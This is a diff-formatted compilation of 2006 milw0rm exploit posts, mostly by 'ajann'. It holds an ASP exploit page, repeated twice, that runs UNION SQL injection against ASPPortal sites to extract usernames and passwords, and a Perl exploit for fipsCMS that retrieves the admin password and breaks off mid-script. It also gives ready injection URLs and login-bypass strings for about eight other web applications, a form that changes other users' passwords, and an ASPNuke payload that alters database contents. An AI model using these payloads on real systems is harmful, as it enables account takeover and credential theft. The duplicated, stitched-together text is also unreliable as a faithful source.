||||
Response.Redirect("exploit1.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata2")
|
||||
|
||||
Else
|
||||
If arama2=0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata3")
|
||||
|
||||
Else
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
target1 = targettext+string1
|
||||
target2 = targettext+string2
|
||||
|
||||
Public Function take(come)
|
||||
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake
|
||||
.Open "POST" , come, FALSE
|
||||
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
|
||||
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
|
||||
take = .Responsetext
|
||||
End With
|
||||
SET objtake = Nothing
|
||||
End Function
|
||||
|
||||
Public Function take1(come1)
|
||||
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake1
|
||||
.Open "POST" , come1, FALSE
|
||||
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
|
||||
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
|
||||
take1 = .Responsetext
|
||||
End With
|
||||
SET objtake1 = Nothing
|
||||
End Function
|
||||
|
||||
get_username = take(target1)
|
||||
get_password = take1(target2)
|
||||
|
||||
getdata=InStr(get_username,"Poll Question:</b> " )
|
||||
username=Mid(get_username,getdata+24,14)
|
||||
passwd=Mid(get_password,getdata+24,14)
|
||||
|
||||
%>
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"> <u><b>
|
||||
ajann<br></b></u></font>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial">User Name:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial"> User Password:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<form method="POST" name="form2" action="#">
|
||||
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
|
||||
</form>
|
||||
|
||||
</center>
|
||||
|
||||
<script language="JavaScript">
|
||||
write()
|
||||
functionControl1()
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
Set objtake = Nothing
|
||||
%>
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
|
||||
'===============================================================================================
|
||||
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit1.asp
|
||||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
|
||||
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
|
||||
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
|
||||
'===============================================================================================
|
||||
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal <=</b>v4.0.0(default1.asp) <u><b>
|
||||
Remote SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit1.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string1="default1.asp"
|
||||
string2="default1.asp"
|
||||
cek= Request.Form("id")
|
||||
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
||||
Response.Redirect("exploit1.asp?islem=hata1")
|
||||
|
||||
Else
|
||||
If arama>0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata2")
|
||||
|
||||
Else
|
||||
If arama2=0 then
|
||||
Response.Redirect("exploit1.asp?islem=hata3")
|
||||
|
||||
Else
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
target1 = targettext+string1
|
||||
target2 = targettext+string2
|
||||
|
||||
Public Function take(come)
|
||||
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake
|
||||
.Open "POST" , come, FALSE
|
||||
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
|
||||
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
|
||||
take = .Responsetext
|
||||
End With
|
||||
SET objtake = Nothing
|
||||
End Function
|
||||
|
||||
Public Function take1(come1)
|
||||
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
|
||||
With objtake1
|
||||
.Open "POST" , come1, FALSE
|
||||
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
|
||||
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
|
||||
take1 = .Responsetext
|
||||
End With
|
||||
SET objtake1 = Nothing
|
||||
End Function
|
||||
|
||||
get_username = take(target1)
|
||||
get_password = take1(target2)
|
||||
|
||||
getdata=InStr(get_username,"Poll Question:</b> " )
|
||||
username=Mid(get_username,getdata+24,14)
|
||||
passwd=Mid(get_password,getdata+24,14)
|
||||
|
||||
%>
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"> <u><b>
|
||||
ajann<br></b></u></font>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial">User Name:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<b><font size="2" face="Arial"> User Password:</font></b></td>
|
||||
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<form method="POST" name="form2" action="#">
|
||||
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
|
||||
</form>
|
||||
|
||||
</center>
|
||||
|
||||
<script language="JavaScript">
|
||||
write()
|
||||
functionControl1()
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
Set objtake = Nothing
|
||||
%>
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
|
|
|
@ -1,19 +1,19 @@
|
|||
*******************************************************************************
|
||||
# Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Vendor: http://www.superfreaker.com/
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//detail.asp?ID=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
*******************************************************************************
|
||||
# Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Vendor: http://www.superfreaker.com/
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//detail.asp?ID=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
|
|
|
@ -1,22 +1,22 @@
|
|||
*******************************************************************************
|
||||
# Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Vendor: http://www.superfreaker.com/
|
||||
# Dork : UPublisher
|
||||
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//detail.asp?id=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
*******************************************************************************
|
||||
# Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Vendor: http://www.superfreaker.com/
|
||||
# Dork : UPublisher
|
||||
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//detail.asp?id=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
|
|
|
@ -1,25 +1,25 @@
|
|||
*******************************************************************************
|
||||
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
|
||||
Vulnerability
|
||||
# Author : ajann
|
||||
# Dork : UPublisher
|
||||
# Vendor: http://www.superfreaker.com/
|
||||
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
|
||||
OR ---
|
||||
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
*******************************************************************************
|
||||
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
|
||||
Vulnerability
|
||||
# Author : ajann
|
||||
# Dork : UPublisher
|
||||
# Vendor: http://www.superfreaker.com/
|
||||
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
|
||||
OR ---
|
||||
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
|
|
|
@ -1,36 +1,36 @@
|
|||
<!--
|
||||
|
||||
# Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit
|
||||
# Author : ajann
|
||||
|
||||
[Code]]]
|
||||
-->
|
||||
<html>
|
||||
<body bgcolor="#000000">
|
||||
<form method="POST" action="save_profile.asp?key=1®key=">
|
||||
User Name<input type="hidden" name="UserID" size="4">
|
||||
<input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40">
|
||||
<input type="text" name="Company" size="40" class="TBox" value="Demo Account">
|
||||
Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40">
|
||||
Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14">
|
||||
Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319">
|
||||
Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10">
|
||||
<input type="submit" value="Submit" name="B1" class="PButton">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
[/Code]]]
|
||||
|
||||
Change: <input type="hidden" name="UserID" size="4"> => ID
|
||||
|
||||
Next Click "Profile"
|
||||
|
||||
#ajann,Turkey
|
||||
#...
|
||||
|
||||
#Im Not Hacker!
|
||||
-->
|
||||
|
||||
# milw0rm.com [2006-11-13]
|
||||
<!--
|
||||
|
||||
# Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit
|
||||
# Author : ajann
|
||||
|
||||
[Code]]]
|
||||
-->
|
||||
<html>
|
||||
<body bgcolor="#000000">
|
||||
<form method="POST" action="save_profile.asp?key=1®key=">
|
||||
User Name<input type="hidden" name="UserID" size="4">
|
||||
<input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40">
|
||||
<input type="text" name="Company" size="40" class="TBox" value="Demo Account">
|
||||
Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40">
|
||||
Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14">
|
||||
Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319">
|
||||
Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10">
|
||||
<input type="submit" value="Submit" name="B1" class="PButton">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
[/Code]]]
|
||||
|
||||
Change: <input type="hidden" name="UserID" size="4"> => ID
|
||||
|
||||
Next Click "Profile"
|
||||
|
||||
#ajann,Turkey
|
||||
#...
|
||||
|
||||
#Im Not Hacker!
|
||||
-->
|
||||
|
||||
# milw0rm.com [2006-11-13]
|
||||
|
|
|
@ -1,19 +1,19 @@
|
|||
*******************************************************************************
|
||||
# Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
*******************************************************************************
|
||||
Example:
|
||||
|
||||
###http://[target]/[path]/admin/
|
||||
|
||||
UserName: ' union select 0,0 from admin
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-13]
|
||||
*******************************************************************************
|
||||
# Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
*******************************************************************************
|
||||
Example:
|
||||
|
||||
###http://[target]/[path]/admin/
|
||||
|
||||
UserName: ' union select 0,0 from admin
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-13]
|
||||
|
|
|
@ -1,19 +1,19 @@
|
|||
*******************************************************************************
|
||||
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
*******************************************************************************
|
||||
Example:
|
||||
|
||||
###http://[target]/[path]/admin/
|
||||
|
||||
UserName: ' union select 0,0,0,0,0,0,0,0 from categories
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-14]
|
||||
*******************************************************************************
|
||||
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
*******************************************************************************
|
||||
Example:
|
||||
|
||||
###http://[target]/[path]/admin/
|
||||
|
||||
UserName: ' union select 0,0,0,0,0,0,0,0 from categories
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-14]
|
||||
|
|
|
@ -1,20 +1,20 @@
|
|||
*******************************************************************************
|
||||
# Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//page.asp?NewsID=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-14]
|
||||
*******************************************************************************
|
||||
# Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//page.asp?NewsID=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-14]
|
||||
|
|
|
@ -1,24 +1,24 @@
|
|||
blogme v3 [admin login bypass & xss (post)]
|
||||
vendor site:http://www.drumster.net/
|
||||
product:blogme v3
|
||||
bug:login bypass & xss (post)
|
||||
risk:high
|
||||
|
||||
|
||||
admin login bypass :
|
||||
user : ' or '1' = '1
|
||||
passwd: 1'='1' ro '
|
||||
|
||||
xss post :
|
||||
in: /comments.asp?blog=85
|
||||
vulnerables fields:
|
||||
- Name
|
||||
- URL
|
||||
- Comments
|
||||
|
||||
|
||||
laurent gaffié & benjamin mossé
|
||||
http://s-a-p.ca/
|
||||
contact: saps.audit@gmail.com
|
||||
|
||||
# milw0rm.com [2006-11-14]
|
||||
blogme v3 [admin login bypass & xss (post)]
|
||||
vendor site:http://www.drumster.net/
|
||||
product:blogme v3
|
||||
bug:login bypass & xss (post)
|
||||
risk:high
|
||||
|
||||
|
||||
admin login bypass :
|
||||
user : ' or '1' = '1
|
||||
passwd: 1'='1' ro '
|
||||
|
||||
xss post :
|
||||
in: /comments.asp?blog=85
|
||||
vulnerables fields:
|
||||
- Name
|
||||
- URL
|
||||
- Comments
|
||||
|
||||
|
||||
laurent gaffié & benjamin mossé
|
||||
http://s-a-p.ca/
|
||||
contact: saps.audit@gmail.com
|
||||
|
||||
# milw0rm.com [2006-11-14]
|
||||
|
|
|
@ -1,22 +1,22 @@
|
|||
vendor site:http://hpe.net/
|
||||
product:hpecs shopping cart
|
||||
bug:injection sql
|
||||
risk:high
|
||||
|
||||
|
||||
login bypass :
|
||||
username: 'or''='
|
||||
passwd: 'or''='
|
||||
|
||||
injection sql (post) :
|
||||
|
||||
http://site.com/search_list.asp
|
||||
variables:
|
||||
Hpecs_Find=maingroup&searchstring='[sql]
|
||||
( or just post your query in the search engine ... )
|
||||
|
||||
laurent gaffié & benjamin mossé
|
||||
http://s-a-p.ca/
|
||||
contact: saps.audit@gmail.com
|
||||
|
||||
# milw0rm.com [2006-11-14]
|
||||
vendor site:http://hpe.net/
|
||||
product:hpecs shopping cart
|
||||
bug:injection sql
|
||||
risk:high
|
||||
|
||||
|
||||
login bypass :
|
||||
username: 'or''='
|
||||
passwd: 'or''='
|
||||
|
||||
injection sql (post) :
|
||||
|
||||
http://site.com/search_list.asp
|
||||
variables:
|
||||
Hpecs_Find=maingroup&searchstring='[sql]
|
||||
( or just post your query in the search engine ... )
|
||||
|
||||
laurent gaffié & benjamin mossé
|
||||
http://s-a-p.ca/
|
||||
contact: saps.audit@gmail.com
|
||||
|
||||
# milw0rm.com [2006-11-14]
|
||||
|
|
|
@ -1,57 +1,57 @@
|
|||
*******************************************************************************
|
||||
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# S.Page : http://www.aspnuke.com
|
||||
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
ASP Nuke
|
||||
Kenneth W. Richards
|
||||
Orvado Technologies
|
||||
-Introduction-
|
||||
|
||||
ASP Nuke is an open-source software application for running a
|
||||
community-based web site on a web server.
|
||||
By open-source, we mean the code is freely available for others to read,
|
||||
modify and use in accordance
|
||||
with the software license.
|
||||
ASP Nuke is an extensible framework that allows you to upgrade and add
|
||||
applications to the website quickly
|
||||
and easily. It uses a modular architecture allowing others to rapidly
|
||||
develop new modules and site operators
|
||||
to re-organize the layout and navigation for their site.
|
||||
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
|
||||
Vulnerability::
|
||||
_________________
|
||||
|
||||
###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&....
|
||||
|
||||
Example = Poll Update
|
||||
|
||||
///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register
|
||||
|
||||
Note: Change UserName because ; failed:already username dont write.
|
||||
|
||||
Some tables,columns
|
||||
___________________
|
||||
|
||||
[tblMember] | [FaqQuestion]
|
||||
MemberID | QuestionID
|
||||
Username | DocumentID
|
||||
Password | Question
|
||||
Firstname | Answer
|
||||
Middlename | Active
|
||||
EmailAddress | OrderNo
|
||||
.. | ..
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-19]
|
||||
*******************************************************************************
|
||||
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# S.Page : http://www.aspnuke.com
|
||||
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
ASP Nuke
|
||||
Kenneth W. Richards
|
||||
Orvado Technologies
|
||||
-Introduction-
|
||||
|
||||
ASP Nuke is an open-source software application for running a
|
||||
community-based web site on a web server.
|
||||
By open-source, we mean the code is freely available for others to read,
|
||||
modify and use in accordance
|
||||
with the software license.
|
||||
ASP Nuke is an extensible framework that allows you to upgrade and add
|
||||
applications to the website quickly
|
||||
and easily. It uses a modular architecture allowing others to rapidly
|
||||
develop new modules and site operators
|
||||
to re-organize the layout and navigation for their site.
|
||||
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
|
||||
Vulnerability::
|
||||
_________________
|
||||
|
||||
###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&....
|
||||
|
||||
Example = Poll Update
|
||||
|
||||
///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register
|
||||
|
||||
Note: Change UserName because ; failed:already username dont write.
|
||||
|
||||
Some tables,columns
|
||||
___________________
|
||||
|
||||
[tblMember] | [FaqQuestion]
|
||||
MemberID | QuestionID
|
||||
Username | DocumentID
|
||||
Password | Question
|
||||
Firstname | Answer
|
||||
Middlename | Active
|
||||
EmailAddress | OrderNo
|
||||
.. | ..
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-19]
|
||||
|
|
|
@ -1,58 +1,58 @@
|
|||
#!/usr/bin/perl
|
||||
#[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid=";
|
||||
$target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target HTTP/1.1\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Password: $1\n";
|
||||
